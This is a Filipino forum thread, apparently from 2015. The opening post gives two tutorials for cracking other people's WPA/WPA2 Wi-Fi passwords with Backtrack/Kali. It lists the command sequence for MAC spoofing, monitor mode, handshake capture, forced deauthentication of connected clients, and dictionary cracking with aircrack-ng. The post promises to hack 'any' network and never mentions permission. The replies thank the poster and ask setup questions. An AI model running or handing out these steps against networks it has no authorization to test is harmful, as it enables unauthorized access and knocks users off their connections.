1. Welcome to PHCorner Forums. Take a moment to Sign up and gain unlimited access and extra privileges that guests are not entitled to, such as:

    All that and more! Registration is quick, simple and absolutely free. Join our community today!

Tutorial Hack wifi using backtrack

Discussion in 'Windows Tools & Tips' started by Jeanh, Jul 15, 2015.

  1. Backtrack is now Kali Linux download it when you get some free time.

    Pre-Requisites:
    1. Kali / back track Linux which will by default have all the tools required to dow what you want.
    2. A Virtual Machine or a Laptop you can use to boot the BT or Kali
    3. A compatible network card, The network card should support packet injection if you want to do it fast else you will have to wait some time for someone disconnect and connect back to the access point.

    Important Phrases To Know:


    MAC Address(Media Access Control Address) is a unique identifier assigned to network interfaces for communications on the physical network segment.

    WAP(Wireless Access Point) is a device that allows wireless devices to connect to a wired network using Wi-Fi

    BSSID(Basic Service Set Identification) is the MAC address of the WAP

    ESSID(Extended Service Set Identification) is the display name of the wireless network

    WPA/WPA2(Wi-Fi Protected Access / Wi-Fi Protected Access II)are two security protocols and security certification programs developed by the Wi-Fi Alliance to secure wireless computer networks.

    PSK(Pre-Shared Key) is the term for the password defined in WPA/WPA2 encrypted networks.


    STEP 1: Changing Your MAC Address :
    1. In Kali/BT open the terminal.
    2. command : ifconfig
    3. This should list all network adapters on your system including your wireless one which should be named something like: Wlanx { wlan0, wlan1 ....}
    4. Turn off your network card using the command : ifconfig wlan0 down
      Note: change wlan0 to what ever it said in previous command.
    5. command : macchanger -m 00:11:22:33:44:55
      This will change your MAC address of your device temporarily
    6. Turn the device back on : ifconfig wlan0 up

    STEP 2: Create a virtual monitoring inteterface.
    In order to listen to the signals that wlan0 is handling we will create a virtual interface that will help us to monitor and handle what wlan0 is sending and receiving.

    1. Command : airmon-ng start wlan0
    2. This will create a new monitor interface called mon0

    STEP 3 : Start the attack by monitoring the wireless traffic

    1. Command : airodump-ng mon0
      this will list down all active AP and their BSSID and other details. Also below the list you will see the list f computer stations connected to any of these APs.
    2. Note down the BSSID and channel it is using (CH in the output) of the AP you want to hit
    3. Hit Ctrl+c to end the monitoring.


    STEP 4: Lock onto the needed AP.
    This will target the communication from just the accespoint you want and start writing don't collected information into a file you need to hack.

    What we are hoping to capture is the 4way handshake data that the systems use to authenticate, this data can then be used to ©râck the password used.

    1. Command : airodump-ng --bssid <bssid of AP> -c 4 -w dumpfilenamemon0
      The underlined parts need to be changed as per the data you have. dumpfilename can be replaced with anyhting.
    2. This will start monitoring the Accesspoint and showing you the stations connected to it too. You need to write down the BSSID of any one of the stations so that you can trick it to disconnect and reconnect.

    STEP 5 : Capturing Authentication Packets
    Note: This will only work if your network card is packet injection compatible else you will have to wait till the the person disconnect and reconnects himself.

    1. Open new terminal and give command :
      aireplay-ng -0 30 -a <BSSID of Station Connected> mon0
      This will send 30 disconnect requests to the computer causing it to try and reconnect to the accesspoint.
    2. If it shows some error or does not seem to work it is probably the issue with the network card and you will need to wait till the user reconnects by himself.
    3. Once the reconnection happens you can see it in the Airmon terminal which is monitoring the packets. A alert should be shown ton the top right corner.
      Hit ctrl+c and exit it. Time to ©râck the password.

    STEP 6: ©râcking the password
    1. You need a password list file which can be downloaded from the internet. Just search for "wordlist" or "password list" you can get files with millions of words and some as big as 1GB to 10Gb. More the words in it the better.
    2. Get and extract the word list file to your home folder.
    3. Run the command :
      air©râck-ng -w wordlist.lst -b <AP BSSID>dumpfilename*.cap
    4. Replace the underlined with the the right details.

    STEP 7: Wait

    1. Wait some time as your computer does the dirty work of ©râcking the password. You should have the password on your screen soon.



    Hack Wi-Fi WPA/WPA2 Password
    Hello everybody, this is today i'm gonna show you how to hack any wi-fi passwords using backtrack 5

    What We Need to hack Wi-fi Password?

    1) Backtrack 5 [ R1 or R2 or R3, any one of this versions ]

    2) Compatible Wi-fi Card

    So Let's Start... 1st open Terminal and Then Follow My Steps :

    1) In Terminal type : airmon-ng there we can see interfaces.

    2) Then type : airmon-ng start wlan0 It must found processes.

    3) then we type : airodump-ng mon0 it will start scanning wi-fi networks.

    4) copy bssid and type : airodump-ng -c (channel) -w (file name) --bssid (bssid) mon0

    5) type : aireplay-ng -0 5 -a (bssid) mon0

    6) click on places home folder drag in terminal wpa-01.cap in terminal and type : air©râck-ng (file Directory) or drag file in
    terminal

    7) type in terminal : air©râck-ng (filename)*.cap -w (dictionary location) And Hit Enter!

    Success! share this 100% working trick with your friends
     
    apyo1925, Choyin, serberuz27 and 4 others like this.
  2. salamat boss sa share
     
  3. lablab likes this.
  4. boss may na download kasi akong password list panu po ilipat un mula sa desktop win 7 to virtual machine backtrack.tnx
     
  5. yan po ang hindi ko alam bossing
     
    lablab likes this.
  6. glenajesglenajes nag PM ako sayo..follow the step na lang
     
    lablab likes this.
  7. windows 7 ok lang poe dyan? ty advance nosz
     
  8. maitry nga pag my time. thanks for sharing.
     
  9. my nabasa na rin akong ganito dati e pero hindi ko pa tinry
     
  10. diba pwede to sa android?ung backtrack?
     
  11. hindi po weh..pero try mo po kung may available apps nyan...
     
  12. meron po backtrack kaya sa android pero di ko pa natry aha:ROFLMAO:
     
  13. di ko pa din po natatry yan..mas madali kasi sa pc weh
     
  14. oo nga po e thanks po ulit(y)
     
  15. boss anong brands ng wifi adapter binabasa nya?
     
  16. derx

    derx El Vampiro Staff Member Moderator

    Wrong section! Thread moved!
     
  17. :dead::dead: pati ba naman ito..ang tagal na nito ohhh
     
Tags / Keywords: